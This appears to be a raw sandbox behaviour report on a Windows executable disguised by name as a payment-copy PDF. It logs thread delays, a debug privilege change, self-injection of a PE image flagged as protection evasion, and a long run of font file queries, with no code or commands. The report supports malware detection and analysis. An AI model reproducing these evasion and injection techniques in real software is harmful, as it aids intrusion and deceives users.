Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596562
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596343
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596231
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596125
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 596015
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595906
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595796
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595468
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595358
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595250
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594922
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594703
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Thread delayed: delay time: 594593
Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4105715037.0000000001107000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A9448 LdrInitializeThunk, 2_2_069A9448
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Memory written: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Process created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
